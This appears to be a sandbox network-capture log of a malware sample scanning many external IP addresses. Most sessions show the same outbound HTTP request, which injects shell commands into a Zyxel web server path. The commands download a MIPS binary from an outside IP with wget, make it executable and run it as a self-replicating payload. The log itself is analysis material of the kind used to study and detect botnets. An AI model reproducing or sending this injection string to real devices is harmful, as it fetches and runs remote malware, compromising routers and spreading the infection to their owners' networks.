                                                      Feb 2, 2024 06:36:06.935988903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7832192.168.2.145259237.222.251.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936005116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7833192.168.2.1455732164.40.250.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936044931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7834192.168.2.1436928178.248.92.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936063051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7835192.168.2.1453816111.178.235.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936113119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7836192.168.2.1456470131.153.100.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936155081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7837192.168.2.1450508191.190.212.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936193943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7838192.168.2.1460368146.198.152.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936238050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7839192.168.2.143659890.4.183.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936280012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7840192.168.2.1443712171.152.219.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936336040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7841192.168.2.144683065.144.91.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936374903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7842192.168.2.143799052.197.195.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936419010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7843192.168.2.1458112148.230.178.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936464071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7844192.168.2.144370466.102.47.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936505079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7845192.168.2.1441280152.39.133.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936533928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7846192.168.2.143683864.80.122.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936562061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7847192.168.2.1452258131.245.186.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936583042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7848192.168.2.1453050222.206.139.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936639071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7849192.168.2.1440616211.138.162.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936685085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7850192.168.2.1449790182.99.52.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936707973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7851192.168.2.1440356154.247.123.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936765909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7852192.168.2.144581652.94.223.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936786890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7853192.168.2.144729865.69.118.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936830997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7854192.168.2.1446080152.127.154.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936872005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7855192.168.2.1458526207.39.39.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936916113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7856192.168.2.1445946123.111.154.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.936961889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7857192.168.2.144023846.10.10.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937005043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7858192.168.2.1447152108.59.33.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937031031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7859192.168.2.1443932144.64.19.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937069893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7860192.168.2.143811295.241.95.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937129021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7861192.168.2.1449710219.56.144.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937166929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7862192.168.2.1457102168.226.226.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937192917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7863192.168.2.1434632194.140.49.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937271118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7864192.168.2.145797627.143.197.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937318087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7865192.168.2.144550461.116.71.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937364101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7866192.168.2.1437248161.94.130.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937422037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7867192.168.2.144918289.203.9.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937453985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7868192.168.2.1438810170.16.128.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937501907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7869192.168.2.1443452102.249.225.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937551022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7870192.168.2.144727868.253.45.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937608957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7871192.168.2.1451140152.13.210.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937637091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7872192.168.2.1435798133.58.169.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937686920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7873192.168.2.1441440110.33.103.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937730074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7874192.168.2.145741882.74.83.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937760115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7875192.168.2.145489084.18.68.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937819004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7876192.168.2.1442708186.55.216.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937854052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7877192.168.2.1437148183.222.127.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937880993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7878192.168.2.145135661.188.176.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937936068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7879192.168.2.1448274122.23.124.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.937964916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7880192.168.2.1435940166.76.220.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938035011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7881192.168.2.1452300141.245.56.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938071966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7882192.168.2.1460300189.221.204.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938112020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7883192.168.2.1457030116.52.144.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938160896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7884192.168.2.143709044.42.86.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938206911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7885192.168.2.145708054.71.0.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938229084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7886192.168.2.1448388113.18.217.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938271999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7887192.168.2.145914270.159.242.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938319921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7888192.168.2.1435720205.66.134.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938358068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7889192.168.2.143828023.150.71.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938410997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7890192.168.2.143635040.246.103.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938436985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7891192.168.2.1460348136.17.130.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938483953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7892192.168.2.145918034.52.106.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938528061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7893192.168.2.145337623.136.208.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938568115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7894192.168.2.1438082147.139.248.105443
                                                      TimestampBytes transferredDirectionData
